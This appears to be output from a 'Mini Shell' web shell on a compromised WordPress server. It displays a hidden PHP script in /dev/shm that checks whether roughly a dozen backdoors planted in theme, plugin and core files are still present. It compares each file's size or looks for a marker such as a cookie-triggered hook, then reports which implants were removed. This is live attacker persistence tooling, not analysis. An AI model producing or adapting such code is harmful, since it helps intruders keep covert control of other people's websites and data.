Mini Shell
Direktori : /dev/shm/ |
|
Current File : //dev/shm/.desc |
<?php $r = '/home/yellvsvv/public_html'; $x = ["/wp-content/themes/top_1739967734/template-parts/dynamic-footer.php"=>"bd@@8710@@97",
"/wp-content/themes/bridge/framework/admin/meta-boxes/post/post-format-video/Contacts.php"=>"bd@@3666@@1973",
"/wp-content/plugins/elementor/core/editor/loader/v2/editor.v2.loader.php"=>"bd@@3702@@1875",
"/wp-content/themes/bridge/framework/admin/options/logo/map.php"=>"bd@@7297@@38",
"/wp-content/plugins/elementor/vendor_prefixed/laravel/serializable-closure/src/Contracts/espanol.php"=>"bd@@7301@@1422",
"/wp-content/plugins/elementor/core/files/assets/svg/svg.handler.php"=>"bd@@7304@@595",
"/wp-content/plugins/elementor/assets/js/packages/editor-canvas/editor.canvas.asset.php"=>"bd@@7305@@620",
"/wp-content/themes/bridge/framework/modules/widgets/portfolio-list/functions.php"=>"bd@@8711@@settings",
"/wp-admin/includes/class-wp-users-list-table.php"=>"bd@@141233@@_COOKIE[3]",
"/wp-content/themes/bridge/framework/admin/options/contact/map.php"=>"bd@@141234@@45",
"/wp-content/themes/oceanwp/inc/third/class-learndash.php"=>"bd@@141235@@38",
"/wp-includes/comment-template.php"=>"bd@@141236@@49",
"/wp-content/themes/bridge/vc_templates/qode_pricing_list_item.php"=>"bd@@141237@@64",
"/wp-content/themes/custom-file-2-1739969306/paqe.php"=>"bd@@2621@@1086"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');